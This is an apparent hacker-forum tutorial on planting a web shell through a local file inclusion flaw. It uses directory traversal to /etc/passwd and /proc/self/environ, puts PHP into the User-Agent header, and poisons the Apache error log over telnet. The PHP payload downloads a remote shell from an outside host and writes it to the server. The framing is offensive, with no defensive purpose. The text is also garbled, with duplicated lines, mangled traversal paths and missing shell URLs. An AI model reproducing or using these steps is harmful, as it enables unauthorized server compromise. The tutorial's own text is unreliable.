Today I Am Going To Teach You Two Ways Of Uploading Shell Via LFI Vul..
ReQuirement:- website vul to lfi.
MethoD 1:-
NOTE: You will need FireFox and its
addon Tamper Data to do this
method!
addon Tamper Data to do this
method!
LFI or Local File Inclusion allows you
to include a local file(which means,
that the file is stored on the server)
and run it in a webscript.
to include a local file(which means,
that the file is stored on the server)
and run it in a webscript.
In this method we are going to
upload a shell by accessing the proc/self/environ.
upload a shell by accessing the proc/self/environ.
Now we have our page:-
http://www.target.com/index.php?
include=register.php
include=register.php
And now we are going to do this:-
http://www.target.com/index.php?
include=../
include=../
If it gives you an error message , this
is good. Best thing that can happen is, it says “No such file or directory”.
is good. Best thing that can happen is, it says “No such file or directory”.
But anyways, now add this to your url:-
http://www.target.com/index.php?
include=../etc/passwd
include=../etc/passwd
And as long as there is no text other
than an error message on the page,
keep adding “../” to the URL, so it would be like:
than an error message on the page,
keep adding “../” to the URL, so it would be like:
http://www.target.com/index.php?
include=…/passwd
include=…/passwd
http://www.target.com/index.php?
include=…/passwd
include=…/passwd
http://www.target.com/index.php?
include=…/passwd
include=…/passwd
And so on. Now let’s say we got to this URL:-
http://www.target.com/index.php?
include=…/passwd
include=…/passwd
And we see some huge shitty text we
can not handle with. Now change the
etc/passwd in the URL to proc/self/environ so it would look like this:
can not handle with. Now change the
etc/passwd in the URL to proc/self/environ so it would look like this:
http://www.target.com/index.php?
include=…environ
include=…environ
If you see some text, you did good, if
you see an error message you did
bad. Now this is the point where we
use Tamper Data. Start you Tamper
and reload the page, and for user
agent you type in the following PHP script:-
you see an error message you did
bad. Now this is the point where we
use Tamper Data. Start you Tamper
and reload the page, and for user
agent you type in the following PHP script:-
PHP Code:-
<?php $file = fopen
(“shell.php” ,”w
+”); $stream = fopen ( “http://
http://www.website.com/
yourshell.txt” , “r” ); while(!
feof($stream )) {
$shell .= fgets
($stream ); } fwrite
($file , $shell ); fclose
($file );?>
(“shell.php” ,”w
+”); $stream = fopen ( “http://
http://www.website.com/
yourshell.txt” , “r” ); while(!
feof($stream )) {
$shell .= fgets
($stream ); } fwrite
($file , $shell ); fclose
($file );?>
This will execute the PHP script on
the site and create a shell.php on the
server. Why? Because the user agent
is being displayed on the webpage,
and if you put in a webscript for that, it will execute it.
the site and create a shell.php on the
server. Why? Because the user agent
is being displayed on the webpage,
and if you put in a webscript for that, it will execute it.
Now simply access your shell by going to
And rape the server.
Now LFI method 2:-
NOTE: This only works on apache servers!
Alright you get back to the point
where we tried to access the etc/passwd. You will do the same method, but not with etc/passwd,
you will try to get access to apache/
logs/error.log
where we tried to access the etc/passwd. You will do the same method, but not with etc/passwd,
you will try to get access to apache/
logs/error.log
If you have a brain, you should know
how to do that, since it’s EXACTLY
the same method as on etc/passwd
(explained in LFI method 1).
how to do that, since it’s EXACTLY
the same method as on etc/passwd
(explained in LFI method 1).
Now when you have found the file,
open up cmd and type in
Code:
open up cmd and type in
Code:
telnet http://www.tagrget.com
80
When you are inside the telnet, you
copy the following code (you use your
own shell url:
copy the following code (you use your
own shell url:
PHP Code:
<?php $file = fopen
(“shell.php” ,”w
+”); $stream = fopen ( “http://
http://www.website.com/
yourshell.txt” , “r” ); while(!
feof($stream )) {
$shell .= fgets
($stream ); } fwrite
($file , $shell ); fclose
($file );?>
(“shell.php” ,”w
+”); $stream = fopen ( “http://
http://www.website.com/
yourshell.txt” , “r” ); while(!
feof($stream )) {
$shell .= fgets
($stream ); } fwrite
($file , $shell ); fclose
($file );?>
Paste it into the telnet window, and
press enter once or maybe twice(until
you get an error message).
press enter once or maybe twice(until
you get an error message).
Now refresh the page in the browser
(error.log) once and there you go.
(error.log) once and there you go.
The PHP script will be executed and
your shell will get uploaded to the
server.
Access it by typing in the
following into your browser:-
your shell will get uploaded to the
server.
Access it by typing in the
following into your browser:-
ENJOY…
Hackers Third Eye 